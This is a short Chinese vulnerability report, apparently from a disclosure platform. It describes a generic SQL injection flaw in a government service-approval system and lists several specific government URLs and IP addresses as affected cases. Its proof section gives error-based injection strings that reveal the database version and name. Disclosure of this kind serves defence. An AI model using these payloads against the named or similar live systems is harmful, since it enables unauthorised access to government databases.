### 简要描述:
rt
### 详细说明:
某政府在用系统通用型SQL注入#8。
案例:
http://www.lgqzwfw.gov.cn/xspww/OutNetChannel/ItemOrgList.aspx
http://60.215.8.148:6006//OutNetChannel/ItemOrgList.aspx
http://www.lgqzwfw.gov.cn/xspww/OutNetChannel/ItemOrgList.aspx
http://shenpi.dongying.gov.cn/fabu/OutNetChannel/ItemOrgList.aspx
http://222.135.78.34:8086/OutNetChannel/ItemOrgList.aspx
### 漏洞证明:
注入证明:
http://www.lgqzwfw.gov.cn/xspww/OutNetChannel/ItemOrgList.aspx
搜索:单引号
[<img src="https://images.seebug.org/upload/201506/01193635723029f4a41af0a4d8beae1b82d62d62.png" alt="QQ图片20150601193023.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/01193635723029f4a41af0a4d8beae1b82d62d62.png)
手工注入:
搜索 1' and @@version=1 and '%'=' 报错曝出数据库版本
[<img src="https://images.seebug.org/upload/201506/01193653687674507544579c2420da851ed8715e.png" alt="QQ图片20150601193111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/01193653687674507544579c2420da851ed8715e.png)
搜索 1' and db_name()=1 and '%'=' 报错曝出数据库表名
[<img src="https://images.seebug.org/upload/201506/01193704156db2928dc7ba9ea429f0585462a95e.png" alt="QQ图片20150601193219.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/01193704156db2928dc7ba9ea429f0585462a95e.png)
暂无评论